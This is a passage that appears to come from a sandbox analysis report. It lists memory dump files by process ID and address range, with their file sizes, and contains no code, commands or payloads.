                                                                                                                                                            • memory/4980-419-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              860KB

                                                                                                                                                            • memory/4980-409-0x00000000026C2000-0x00000000026C3000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4980-400-0x00000000026C0000-0x00000000026C1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/4980-417-0x00000000004E0000-0x000000000062A000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              1.3MB

                                                                                                                                                            • memory/4980-241-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/4980-425-0x00000000026C4000-0x00000000026C6000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/4980-411-0x00000000026C3000-0x00000000026C4000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5008-351-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5068-247-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5068-283-0x0000000000860000-0x0000000000861000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5068-299-0x00000000051B0000-0x00000000051B1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5104-347-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5388-379-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5468-383-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5532-385-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5556-387-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5716-394-0x0000000000402E1A-mapping.dmp
                                                                                                                                                            • memory/5716-398-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              36KB

                                                                                                                                                            • memory/5760-395-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5780-405-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/5780-396-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/5812-397-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/6080-428-0x00000000057F0000-0x00000000057F1000-memory.dmp
                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                            • memory/6080-420-0x0000000000000000-mapping.dmp
                                                                                                                                                            • memory/6120-422-0x0000000000000000-mapping.dmp